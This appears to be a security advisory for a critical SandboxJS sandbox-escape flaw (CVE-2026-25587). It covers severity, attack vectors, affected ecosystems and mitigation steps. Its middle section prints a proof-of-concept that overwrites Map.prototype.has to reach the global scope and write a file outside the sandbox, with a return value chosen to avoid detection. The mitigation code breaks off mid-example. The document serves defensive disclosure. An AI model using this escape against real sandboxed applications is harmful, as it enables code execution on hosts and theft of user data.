Description
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, as Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped. This vulnerability is fixed in 0.8.29.
EPSS Score:
0%
EUVD-2026-5590: Critical Sandbox Escape Vulnerability in SandboxJS
Executive Summary
Severity: CRITICAL (CVSS 10.0)
EUVD-2026-5590 represents a critical sandbox escape vulnerability in SandboxJS, a JavaScript sandboxing library. The vulnerability allows complete bypass of sandbox protections through prototype pollution of the Map object, enabling arbitrary code execution with full system privileges. This represents a complete failure of the security boundary that SandboxJS is designed to enforce.
1. Vulnerability Assessment and Severity Evaluation
Severity Analysis
- CVSS 3.1 Score: 10.0 (Critical)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSS Breakdown:
- Attack Vector (AV:N): Network-based exploitation possible
- Attack Complexity (AC:L): Low complexity; straightforward exploitation
- Privileges Required (PR:N): No authentication or privileges needed
- User Interaction (UI:N): No user interaction required
- Scope (S:C): Scope change - attacker can affect resources beyond the vulnerable component
- Confidentiality (C:H): Complete information disclosure
- Integrity (I:H): Complete system compromise possible
- Availability (A:H): Complete denial of service possible
Risk Assessment:
This vulnerability represents a complete security boundary failure. The sandbox mechanism, designed to isolate and restrict untrusted JavaScript code execution, can be entirely bypassed. This is particularly severe because:
- Fundamental Design Flaw: The vulnerability stems from incorrect assumptions about JavaScript prototype chain security
- Zero Prerequisites: Exploitation requires no authentication, special privileges, or user interaction
- Complete Compromise: Successful exploitation grants full access to the host environment
- Widespread Impact: Any application relying on SandboxJS for security isolation is vulnerable
2. Potential Attack Vectors and Exploitation Methods
Technical Vulnerability Details
Root Cause: SandboxJS incorrectly includes Map in its SAFE_PROTOTYPES list, allowing attackers to access and manipulate Map.prototype.
Exploitation Mechanism:
// Step 1: Access Map.prototype (incorrectly allowed)
const mapProto = Map.prototype;
// Step 2: Overwrite critical methods like 'has'
mapProto.has = function(key) {
// Malicious code execution
// Access to parent scope/context
// Bypass sandbox restrictions
return this.constructor.constructor('return this')();
};
// Step 3: Trigger the compromised method
// When sandbox internal code uses Map.has(), malicious code executes
// with full privileges outside the sandbox
Attack Vectors:
Vector 1: Direct Code Injection
- Scenario: Web applications accepting user-provided JavaScript for execution in sandbox
- Method: Submit malicious code that overwrites Map.prototype.has
- Impact: Immediate sandbox escape, access to Node.js/browser APIs
Vector 2: Supply Chain Attack
- Scenario: Malicious npm package or dependency includes exploit code
- Method: Exploit executes during package installation or runtime
- Impact: Complete compromise of development/production environments
Vector 3: Plugin/Extension Systems
- Scenario: Applications using SandboxJS to isolate third-party plugins
- Method: Malicious plugin exploits vulnerability to escape isolation
- Impact: Access to application internals, user data, system resources
Vector 4: Server-Side Template Injection (SSTI)
- Scenario: Server-side JavaScript rendering with SandboxJS protection
- Method: Inject prototype pollution payload through template variables
- Impact: Remote code execution on server infrastructure
Vector 5: WebAssembly/JavaScript Hybrid Attacks
- Scenario: Complex applications mixing WASM and sandboxed JS
- Method: Use WASM to prepare memory state, trigger via JS prototype pollution
- Impact: Advanced persistent threats, memory corruption
Proof of Concept (Conceptual):
// Minimal PoC for sandbox escape
(function() {
// Overwrite Map.prototype.has
Map.prototype.has = function() {
// Gain access to Function constructor
const FunctionConstructor = this.constructor.constructor;
// Execute arbitrary code outside sandbox
const globalScope = FunctionConstructor('return this')();
// Example: Access file system (Node.js)
const fs = globalScope.require('fs');
fs.writeFileSync('/tmp/pwned', 'Sandbox escaped');
return false; // Return expected value to avoid detection
};
// Trigger the vulnerability when sandbox uses Map internally
})();
3. Affected Systems and Software Versions
Directly Affected:
- Product: SandboxJS (nyariv/SandboxJS)
- Vulnerable Versions: All versions < 0.8.29
- Fixed Version: 0.8.29 and later
- CVE Identifier: CVE-2026-25587
Potentially Affected Ecosystems:
Node.js Applications:
- Server-side JavaScript applications using SandboxJS for code isolation
- Serverless functions (AWS Lambda, Azure Functions, Google Cloud Functions)
- Backend API services processing user-submitted code
- Build systems and CI/CD pipelines executing untrusted scripts
Browser-Based Applications:
- Web-based IDEs and code playgrounds (e.g., JSFiddle-like platforms)
- Online learning platforms with interactive coding exercises
- Browser extensions using SandboxJS for content script isolation
- Progressive Web Apps (PWAs) with plugin architectures
Specific Use Cases at Risk:
- Low-code/No-code Platforms: User-defined business logic execution
- Content Management Systems: Custom scripting capabilities
- Game Engines: User-generated content and modding support
- Analytics Platforms: Custom metric calculation scripts
- Workflow Automation Tools: User-defined automation scripts
- Testing Frameworks: Isolated test execution environments
Dependency Chain Impact:
Applications may be vulnerable through transitive dependencies. Organizations should audit:
- Direct dependencies in package.json/package-lock.json
- Nested dependencies using
npm ls sandboxjsoryarn why sandboxjs - Bundled applications that may include vulnerable versions
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours):
1. Version Upgrade
# Update to patched version immediately
npm update sandboxjs@latest
# or
yarn upgrade sandboxjs@latest
# Verify version
npm ls sandboxjs
# Ensure version >= 0.8.29
2. Emergency Workaround (if immediate upgrade impossible):
// Freeze Map.prototype before initializing sandbox
Object.freeze(Map.prototype);
Object.freeze(Set.prototype);
Object.freeze(WeakMap.prototype);
Object.freeze(WeakSet.prototype);
// Initialize SandboxJS after freezing
const Sandbox = require('sandboxjs');
Warning: This workaround may break legitimate functionality and should only be temporary.
3. Disable Affected Features
- Temporarily disable user code execution features
- Implement strict input validation and sanitization
- Add rate limiting to code execution endpoints
Short-Term Mitigations (Priority 2 - Within 1 Week):
1. Defense in Depth
// Implement additional security layers
const vm = require('vm');
const Sandbox = require('sandboxjs');
function executeUserCode(code) {
// Layer 1: Input validation
if (!isValidCode(code)) {
throw new Error('Invalid code');
}
// Layer 2: Resource limits
const timeout = 5000; // 5 seconds
const memoryLimit = 50 * 1024 * 1024; // 50MB
// Layer 3: VM isolation + SandboxJS
const context = vm.createContext({
sandbox: new Sandbox({
timeout: timeout,
References
Affected Products
sandboxjs
Version: < 0.8.29
Vendors
nyariv